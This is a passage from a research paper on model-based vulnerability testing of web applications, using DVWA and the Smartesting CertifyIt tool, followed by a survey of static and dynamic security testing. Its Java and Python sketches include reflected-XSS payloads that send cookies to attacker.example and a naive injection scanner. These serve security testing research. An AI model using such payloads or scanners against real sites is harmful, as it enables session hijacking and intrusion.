The implementation of these operations is the responsibility of the test automation engineer; a hypothetical sketch of such an interface is given below. According to our DVWA example, we use two test purposes and have defined four malicious data, in order to test one page with one user input field. Each test purpose produces 12 test targets, and each test target produces exactly one abstract test case, for a total of 24 abstract test cases.
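A hypothetical Java rendering of such an exported interface might look like the following; the names injectAllFields, injectField, checkMessage and checkRXSSAttack come from the DVWA model, while the functional operations and all signatures are assumptions made for illustration.

    // Hypothetical adaptation-layer interface exported from the model: the last four
    // operation names appear in the DVWA model, the rest are assumptions.
    public interface DvwaSut {
        void login(String user, String password);               // functional subset
        void setSecurityLevel(String level);                    // "low", "medium" or "high"
        void gotoPage(String page);                              // load the targeted page
        void injectAllFields(String maliciousData);              // inject into every input field
        void injectField(String field, String maliciousData);    // inject into one chosen field
        String checkMessage();                                    // observe the application feedback
        boolean checkRXSSAttack(String maliciousData);            // oracle: has a breach been observed?
    }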


Figure VIII presents one of the generated abstract test cases. It has to be interpreted this way:

i. it logs in to the application with valid credentials;

ii. it sets the security level;

iii. it loads the targeted Web page;

iv. it verifies the correct execution of the functional part of the test case (using the checkMessage observation);

v. it injects the malicious datum;

vi. it verifies whether there exists an application-level breach or not (using the checkRXSSAttack observation). This last step assigns the verdict of the test case.

Regarding the test purpose targeting specific user input fields, the test cases only differ at step 6, where the injectField operation replaces the injectAllFields operation.
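Under the same assumptions, one exported JUnit test case corresponding to the six steps above might read as follows; this is a sketch only, using the hypothetical DvwaSut interface shown earlier, and the credentials and page identifier are illustrative values.

    import org.junit.Assert;
    import org.junit.Test;

    public class ReflectedXssTest {

        // Wired by the test automation engineer to a concrete GUI-level (Selenium) or
        // HTTP-level (HttpClient) adapter implementing the hypothetical DvwaSut interface.
        private DvwaSut sut;

        @Test
        public void rxssCookie1OnLowSecurity() {
            sut.login("admin", "password");              // i.   log in with valid credentials (illustrative values)
            sut.setSecurityLevel("low");                 // ii.  set the security level
            sut.gotoPage("XSS_REFLECTED_PAGE");          // iii. load the targeted Web page
            Assert.assertNotNull(sut.checkMessage());    // iv.  functional check of the previous steps
            sut.injectAllFields("RXSS_COOKIE1");         // v.   inject the malicious datum
            // vi. oracle: success of this last step corresponds to the "attack-pass" verdict
            //     of Section 5.4, its failure to the "attack-fail" verdict.
            Assert.assertTrue("no RXSS breach observed", sut.checkRXSSAttack("RXSS_COOKIE1"));
        }
    }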

5.4 Adaptation and Test Execution

During the modelling activity, each page, user input field, malicious datum, user credential, and so on (in short, all data used by the application) is modelled in an abstract way. Hence, the test suite cannot be executed as it is: the gap between the abstract keywords used in the abstract test cases and the real API of the SUT must be filled. To ease the understanding of our approach, we only present a one-to-one adaptation, but tables with multiple values are also used for one-to-many mappings. Stimuli must also be adapted. When exporting the abstract test cases, the MBT tool provides an interface defining the signature of each operation, and the test automation engineer is in charge of implementing the automated execution of each operation of this interface. Because we are testing Web applications, we have studied two ways of automation:

a. At the GUI level: we stimulate and observe the application via the client-side GUI of the application. Even if this technique is time consuming, it could be necessary when the client-side part of the application embeds JavaScript scripts. For this technique, we use the Selenium framework.

b. At the HTTP level: we stimulate and observe the application via HTTP messages sent to (and received from) the server-side application. This technique is extremely fast and can be used to bypass HTML and JavaScript limitations. For this technique, we are using the Apache HTTPClient Java library (a sketch of such an adapter is given below).
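A minimal sketch of what an HTTP-level adaptation of the injectField operation could look like with Apache HttpClient 4.x is given below; the use of a POST form and the absence of session handling are simplifying assumptions, not a description of the actual DVWA adapter.

    import java.nio.charset.StandardCharsets;
    import java.util.Collections;

    import org.apache.http.client.entity.UrlEncodedFormEntity;
    import org.apache.http.client.methods.CloseableHttpResponse;
    import org.apache.http.client.methods.HttpPost;
    import org.apache.http.impl.client.CloseableHttpClient;
    import org.apache.http.impl.client.HttpClients;
    import org.apache.http.message.BasicNameValuePair;
    import org.apache.http.util.EntityUtils;

    public class HttpLevelAdapter {

        private final CloseableHttpClient client = HttpClients.createDefault();
        private String lastResponseBody = "";

        // Sends the concrete malicious datum as the value of one form field and keeps
        // the response body so that the observation step can inspect it afterwards.
        public void injectField(String pageUrl, String field, String maliciousData) throws Exception {
            HttpPost post = new HttpPost(pageUrl);
            post.setEntity(new UrlEncodedFormEntity(
                    Collections.singletonList(new BasicNameValuePair(field, maliciousData)),
                    StandardCharsets.UTF_8));
            try (CloseableHttpResponse response = client.execute(post)) {
                lastResponseBody = EntityUtils.toString(response.getEntity());
            }
        }

        public String lastResponseBody() {
            return lastResponseBody;
        }
    }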

The last but not least activity of MBVT is to execute the adapted test cases in order to produce a verdict. We introduce a new terminology fitting the characteristics of such a test execution:

a. Attack-pass: the complete execution of the test reveals that the application contains a breach, unlike in MBT where the complete execution of a test indicates a valid implementation;

b. Attack-fail: the failure of the execution of the last step reveals that the application is robust to the attack, unlike MBT where such a failure indicates an invalid implementation;

c. Inconclusive: in certain circumstances, it is not sure that a breach is discovered (e.g., due to technical issues). An abnormal event happens, but no breach has been observed.
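A plausible, assumed implementation of the checkRXSSAttack observation at the HTTP level simply looks for the injected concrete payload reflected verbatim (i.e., unencoded) in the last response body; the verdict then follows the terminology above. A real oracle would also need to handle the inconclusive case, for example on transport errors.

    public class RxssOracle {

        // Returns true when the concrete payload is reflected verbatim (unencoded) in the
        // response body: the page is vulnerable and the test verdict is "attack-pass".
        // If the payload is absent, or comes back HTML-encoded, the application resisted
        // the attack and the verdict is "attack-fail".
        public static boolean checkRXSSAttack(String responseBody, String concretePayload) {
            return responseBody != null && responseBody.contains(concretePayload);
        }
    }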


According to our DVWA example, the model defines four malicious data dedicated to Reflected XSS attacks. These values are defined in an abstract way, and must be adapted. Each of them is mapped to a concrete value, as shown in Figure XI.

Fig. XI Mapping between abstract and concrete values
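Such a mapping can be expressed as a simple lookup table; the concrete payloads below are illustrative placeholders consistent with the intent of each abstract value, not the exact strings of Figure XI.

    import java.util.Map;

    public class MaliciousDataCatalog {

        // Abstract keywords from the model mapped to illustrative concrete payloads.
        static final Map<String, String> RXSS_PAYLOADS = Map.of(
            "RXSS_DUMMY",
            "<script>alert('xss')</script>",
            "RXSS_COOKIE1",
            "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
            "RXSS_COOKIE2",
            "<img src=x onerror=\"new Image().src='http://attacker.example/?c='+document.cookie\">",
            "RXSS_WAF_EVASION",
            "<ScRiPt>alert(String.fromCharCode(88,83,83))</ScRiPt>");

        static String concretize(String abstractValue) {
            return RXSS_PAYLOADS.get(abstractValue);
        }
    }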

Operations of the SUT can be adapted in two ways: using Selenium or HTTPClient. However, we mainly use the HTTP-based approach (HTTPClient), because this technique dramatically saves time on DVWA, for the same results. Based on the execution of the test suite, 50% of the test cases have been identified as Attack-pass: the first two malicious data with the low security level, the third malicious datum with the low and medium security levels, and the fourth malicious datum with the medium security level. These results fit our manual experiments on DVWA. This concordance gives a first validation of our approach with regard to the addressed subset of vulnerabilities and the DVWA context.

6. STATE OF THE ART

The tool landscape in web application security testing is structured into two main classes of techniques:

a. Static Application Security Testing (SAST), which are white-box approaches including source, byte and object code scanners and static analysis techniques;

b. Dynamic Application Security Testing (DAST), which includes black-box web applications scanners, fuzzing techniques and emerging model-based security testing approaches.

6.1 Static Application Security Testing

Static application security testing takes place during the implementation phase of a project and is a required practice in Microsoft's Security Development Lifecycle. It is also one of the methods that can be used to mitigate security risks for applications that are required to comply with the Payment Card Industry Data Security Standard (PCI DSS). Static application security testing (SAST) can be thought of as testing the application from the inside out, by examining its source code, byte code or application binaries for conditions indicative of a security vulnerability.

A thorough source code review has an advantage over dynamic testing: nothing is hidden from analysts during a source code review, so they can examine exactly how data flows through a program. Specific attributes of the application, such as credit card numbers and personal data, can be taken into account, allowing the full range of security vulnerabilities to be identified. A source code review can help ensure that secure coding policies are followed and that unsafe or prohibited functions are not being used, for example by looking at the way errors are handled and by checking permissions on configuration files and network connections.
By solving the problem at the code level, static testing reduces the number of security-related design and coding defects, and the severity of any defects that make it through to the release version, thus dramatically improving the overall security of the application. Automated tools greatly reduce the time it takes to review complex reams of code. Although static analysis tools cannot test adherence to security policy or identify backdoors in an application in the way a manual code review can, they can shorten the time it takes to review large, complex applications.

High-end tools use sophisticated functions such as data flow analysis, control flow analysis and pattern recognition to identify potential security vulnerabilities; the findings are only potential because the results tend to include a high number of false positives. The advantage is that such tools can analyze highly complex reams of code and identify the issues a manual review should concentrate on, which can make them quite cost-effective. One does, however, need to be aware of the strengths and weaknesses of static analysis tools and be prepared to augment them with human reviews where appropriate. For example, automated tools tend to be weak at detecting errors that arise from poor flow control and badly implemented business logic. It is possible to use internal staff for these reviews as long as they have the necessary skills and experience and are not the same employees who developed the application. However, having dedicated code reviewers is only economical for large enterprises that are constantly developing their own applications. The flip side is that a well-built application does not require the same level of ongoing care and maintenance as one that is repeatedly hacked into due to unidentified coding flaws.

6.2 Dynamic Application Security Testing

Dynamic application security testing (DAST) can be thought of as testing the application from the outside in, by examining the application in its running state and trying to poke and prod it in unexpected ways in order to discover security vulnerabilities.


These techniques are complementary and address different types of vulnerabilities. For example, SAST techniques are good at detecting buffer overflows and other badly formatted strings, but not as good at detecting XSS or CSRF vulnerabilities. In this section, we therefore focus on DAST techniques and provide a state of the art of emerging model-based security testing techniques. We believe that the ability to test an application both statically and dynamically will become increasingly important, for two main reasons:

a. Some vulnerabilities can be found only with SAST, others only with DAST; testing in both ways yields the most comprehensive coverage.

b. Many web applications that would traditionally be scanned with DAST tools also contain a significant amount of client-side code in the form of JavaScript, Flash, Flex and Silverlight. This code must also be analysed for security vulnerabilities, typically using static analysis.

There are other reasons, but the bottom line is that testing an application with only one form of testing tool leaves residual risk; our most critical applications should be tested using both SAST and DAST techniques. The good news is that several vendors offer both forms of testing, so the purchase of two separate tools or services is not required.

Fuzzing techniques rely on the massive injection of invalid or atypical data (for example by randomly corrupting an XML file), generally using a randomized approach. Test execution can therefore expose various invalid behaviours such as crashes, failing built-in code assertions or memory leaks.

Web application vulnerability scanners aim to detect vulnerabilities by injecting attack vectors. These tools generally include three main components: a crawler module, which follows web links and URLs in the web application in order to retrieve injection points; an injection module, which analyses web pages and input points to inject attack vectors (such as code injections); and an analysis module, which determines possible vulnerabilities based on the system response after attack vector injection (a minimal sketch of this three-module structure is given after the list below). As shown in recent comprehensive studies and confirmed by our own experience with tools such as IBM AppScan, these tools suffer from two major weaknesses that greatly decrease their practical usefulness:

a. Limitations in application discovery: Because black-box web vulnerability scanners ignore any request that can change the state of the web application, they miss large parts of it. These tools therefore generally test only a small portion of the web application, as they ignore its behavioural “intelligence”. Due to the growing complexity of web applications, they also have trouble dealing with specific issues such as infinite web sites with random URL-based session IDs or automated form submission.

b. Generation of many false positive results: The already-mentioned benchmark shows that a common drawback of these tools is the generation of false positives at a very high rate, whether for Reflected XSS, SQL injection or Remote File Inclusion vulnerabilities. The reason is that these tools use brute-force mechanisms to fuzz the input data in order to trigger vulnerabilities and establish a verdict by comparison with a reference execution trace. They therefore lack precision in assigning the verdict, as they do not compute the topology of the web application and thus do not know precisely where to observe.
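To fix ideas, here is a deliberately naive Python skeleton of the crawler/injection/analysis structure sketched above; the attack vectors, the regular-expression link extraction and the reflection-based verdict are simplifying assumptions, and it is precisely this kind of brute-force verdict that produces the false positives discussed in point (b).

import re
from urllib.parse import urljoin
import requests

ATTACK_VECTORS = ["<script>alert(1)</script>", "' OR '1'='1"]

def crawl(start_url, limit=20):
    # Crawler module: follow links found in pages to collect candidate URLs.
    seen, queue = set(), [start_url]
    while queue and len(seen) < limit:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        html = requests.get(url, timeout=10).text
        queue.extend(urljoin(url, href) for href in re.findall(r'href="([^"]+)"', html))
    return sorted(seen)

def inject(url, param):
    # Injection module: send each attack vector to one input point of a page.
    return [(v, requests.get(url, params={param: v}, timeout=10).text)
            for v in ATTACK_VECTORS]

def analyse(results):
    # Analysis module: naive verdict, report a vector if it is reflected verbatim.
    return [v for v, body in results if v in body]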


These strong limitations of existing web vulnerability scanners lead to the key objective of model-based vulnerability testing techniques: better accuracy in vulnerability detection, achieved both by covering the application more thoroughly (capturing its behavioural intelligence) and by increasing the precision of verdict assignment.

Model-based security testing is an emerging set of techniques that leverages model-based approaches for security testing. It includes:

a. Model-based test generation from security protocol, access-control or security-oriented models: Various types of models of the security aspects of the system under test have been considered as input to generate security tests. For example, one approach uses security protocol mutation to infer security test cases; [2] develops a model-based security test generation approach from security models in UMLsec; and [3] presents a methodology that exploits a model describing a Web application at the browser level to guide a penetration tester in finding attacks based on logical vulnerabilities.

b. Model-based fuzzing: This approach applies fuzzing operators in conjunction with models. For example, [4] proposes an approach that generates invalid message sequences instead of invalid input data, by applying behavioural fuzzing operators to valid message sequences in the form of UML sequence diagrams (a small sketch of such operators is given after this list).

c. Model-based test generation from weakness or attack models: In these approaches, test cases are generated using threat, vulnerability or attacker models, which reflect the common steps needed to perform an attack and the associated data required. For example, in [5], threats to security policies are modelled with UML sequence diagrams, allowing the extraction of event sequences that should not occur during system execution.
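As an illustration of point (b), the sketch below applies three simple behavioural fuzzing operators (remove, repeat, swap) to a valid message sequence in order to derive invalid sequences; the message names are hypothetical and the operators are simplified with respect to [4].

import random

VALID_SEQUENCE = ["login", "select_product", "add_to_cart", "checkout", "pay"]

def remove_message(seq):
    i = random.randrange(len(seq))
    return seq[:i] + seq[i + 1:]

def repeat_message(seq):
    i = random.randrange(len(seq))
    return seq[:i + 1] + [seq[i]] + seq[i + 1:]

def swap_adjacent(seq):
    i = random.randrange(len(seq) - 1)
    return seq[:i] + [seq[i + 1], seq[i]] + seq[i + 2:]

FUZZING_OPERATORS = [remove_message, repeat_message, swap_adjacent]

def behavioural_fuzz(seq, count=5):
    # Derive 'count' invalid message sequences from one valid sequence.
    return [random.choice(FUZZING_OPERATORS)(list(seq)) for _ in range(count)]

for invalid in behavioural_fuzz(VALID_SEQUENCE):
    print(invalid)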

Complementary to these model-based techniques for security testing, our model-based vulnerability testing approach generates vulnerability tests from a model that mixes functional behavioural features of the system under test with aspects that model the possible attacks, i.e., aspects of the system's environment. Moreover, contrary to functional MBT, the proposed MBVT process is driven by vulnerability test patterns, so that the behavioural model is restricted to only those elements needed to compute the vulnerability test cases.

The research goal of the MBVT approach introduced in this paper is thus to improve the accuracy and precision of vulnerability testing by means of models (inferred or manually designed) and test patterns. By accuracy of vulnerability testing, we mean the capability to focus vulnerability testing on the relevant part of the software (e.g., from a risk assessment point of view) depending on the targeted vulnerability types. By precision, we mean the capability to avoid both false positives and false negatives.
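The toy Python sketch below illustrates this idea: a small behavioural model (pages and transitions) is combined with a vulnerability test purpose that indicates where to inject and where to observe, and the generator produces an abstract test case restricted to the states the purpose needs. All names are illustrative assumptions; this is not the actual Smartesting CertifyIt engine or its API.

from collections import deque

# Behavioural model: only the navigation needed by the test purpose.
TRANSITIONS = {
    "start": [("login", "home")],
    "home": [("open_search", "search_page"), ("open_profile", "profile")],
    "search_page": [("submit_search", "results")],
    "profile": [("edit_bio", "profile")],
}

# Vulnerability test purpose for a reflected XSS pattern: reach the injection
# point, inject the attack vector, then observe the page where it may appear.
TEST_PURPOSE = {
    "injection_state": "search_page",
    "attack_vector": "<script>alert(1)</script>",
    "observation_state": "results",
}

def path_to(target, start="start"):
    # Breadth-first search over the behavioural model for a sequence of actions.
    queue, visited = deque([(start, [])]), {start}
    while queue:
        state, actions = queue.popleft()
        if state == target:
            return actions
        for action, nxt in TRANSITIONS.get(state, []):
            if nxt not in visited:
                visited.add(nxt)
                queue.append((nxt, actions + [action]))
    return None

def generate_abstract_test(purpose):
    # Abstract test case = reach the injection point, inject, then observe.
    steps = path_to(purpose["injection_state"])
    return steps + [f"inject({purpose['attack_vector']!r})",
                    f"observe({purpose['observation_state']})"]

print(generate_abstract_test(TEST_PURPOSE))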

7. CONCLUSION

Web application vulnerabilities fall into two categories:

a. Technical vulnerabilities: these include cross-site scripting, injection flaws and buffer overflows.


b. Logical vulnerabilities: these relate to the logic of the application, i.e., getting it to do things it was never intended to do, and often result from faulty application logic. Logical vulnerabilities are specific to the functionality of particular web applications and are thus extremely difficult to characterize and identify. For example, an important security breach was discovered and disclosed in 2012 in the PayPal payment module of the Magento ecommerce framework, due to the possibility of falsifying the payment amount.

This paper proposes a Model-Based Vulnerability Testing (MBVT) approach based on a behavioural model and test patterns, which aims to address both technical and logical vulnerabilities. Technical vulnerabilities are handled by composing a navigational behavioural model with related test patterns; logical vulnerabilities may be addressed through more complete modelling and adequate patterns. The research goal is to improve the capability to focus vulnerability testing on the relevant part of the software (e.g., from a risk assessment point of view) and the capability to avoid both false positives and false negatives, where a false positive occurs when a vulnerability is reported that does not actually exist, and a false negative occurs when an existing vulnerability goes unreported.

MBVT deeply renews the research questions around MBT. The target is now negative tests (simulating attacks from a malicious agent) rather than positive tests, and automated test generation is driven by ad-hoc test purposes capturing vulnerability test patterns. At this stage of our research, this has already strongly impacted the core test generation engine of the MBT technology we are using (Smartesting CertifyIt), which was initially based on model coverage only.

The main drawback of model-based vulnerability testing echoes that of MBT in general: the effort needed to design models, test purposes, and the adapter. We are following several research directions to reduce this effort, which consist in identifying the reusability potential of these three artefacts from one project to another: test purposes can be made generic to their affiliated vulnerability type; model parts can be made generic to a web development framework (such as Magento for e-commerce solutions) and can also be generated automatically, at least partially, using crawling techniques; and the adapter for those model parts can likewise be made generic to the associated framework.

Therefore, future work follows two main research directions:

i. Extending the method to cover more vulnerability classes, both technical (such as CSRF, file disclosure and file injection) and logical (such as the integrity of data across application business processes).

ii. Investigating how the various MBVT artefacts may be made generic and reusable from one project to another. In this context, we will focus on ecommerce applications, and more particularly on ecommerce applications built on top of the Magento framework. Indeed, ecommerce applications built with Magento are good candidates because they rely on custom development and the use of add-ons, both of which are well known to introduce security vulnerabilities.

Finally, this MBVT approach will be used as a basis to define and experiment with risk-based security testing techniques for large-scale networked systems within the European FP7 project RASEN.


8. REFERENCES

[1] F. Bouquet, C. Grandpierre, B. Legeard, F. Peureux, N. Vacelet, and M. Utting, “A subset of precise UML for model-based testing,” in Proceedings of the 3rd Int. Workshop on Advances in Model Based Testing (A-MOST’07). London, UK: ACM Press, July 2007, pp. 95–104.

[2] J. Jürjens, “Model-based Security Testing Using UMLsec: A Case Study,” Electronic Notes in Theoretical Computer Science (ENTCS), vol. 220, no. 1, pp. 93–104, December 2008.

[3] M. Buchler, J. Oudinet, and A. Pretschner, “Semi-Automatic Security Testing of Web Applications from a Secure Model,” in Proc. of the 6th IEEE Int. Conf. on Software Security and Reliability (SERE’12). Gaithersburg, MD, USA: IEEE Computer Society, June 2012, pp. 253–262.

[4] M. Schneider, “Model-based behavioural fuzzing,” in Proceedings of the 9th International Workshop on Systems Testing and Validation (STV’12), Paris, France, October 2012, pp. 39–47.

[5] L. Wang, E. Wong, and D. Xu, “A threat model driven approach for security testing,” in Proceedings of the 3rd Int. Workshop on Software Engineering for Secure Systems (SESS’07). Minneapolis, MN, USA: IEEE Computer Society, May 2007.


[6] http://www.infoq.com/articles/defending-against-web-application-vulnerabilities

[7] http://www.spacios.eu/sectest2013/pdfs/sectest2013_submission_8.pdf

[8] http://narainko.wordpress.com/2012/08/26/understanding-false-positive-and-false-negative

[9] http://istina.msu.ru/media/publications/articles/5db/2e2/2755271/OWASP-AppSecEU08-Petukhov.pdf

[10] http://searchsecurity.techtarget.com/answer/Software-testing-methodologies-Dynamic-versus-static-application-security-testing

[11] http://blogs.gartner.com/neil_macdonald/2011/01/19/static-or-dynamic-application-security-testing-both

[12] http://www.cisco.com/web/about/security/intelligence/sql_injection.html

[13] https://www.owasp.org/index.php/Blind_SQL_Injection

[14] J. Bau, E. Bursztein, D. Gupta, and J. Mitchell, “State of the Art: Automated Black-Box Web Application Vulnerability Testing,” in Proceedings of the 31st Int. Symposium on Security and Privacy (SP’10). Oakland, CA, USA: IEEE Computer Society, May 2010, pp. 332–345.

[15] M. Utting and B. Legeard, Practical Model-Based Testing: A Tools Approach. San Francisco, CA, USA: Morgan Kaufmann (Elsevier Science), 2006.

[16] A. Dias-Neto and G. Travassos, “A Picture from the Model-Based Testing Area: Concepts, Techniques, and Challenges,” Advances in Computers, vol. 80, pp. 45–120, July 2010, ISSN: 0065-2458.

[17] E. Bernard, F. Bouquet, A. Charbonnier, B. Legeard, F. Peureux, M. Utting, and E. Torreborre, “Model-based testing from UML models,” in Proceedings of the Int. Workshop on Model-based Testing (MBT’2006), ser. LNCS, vol. 94. Dresden, Germany: Springer Verlag, October 2006, pp. 223–230.
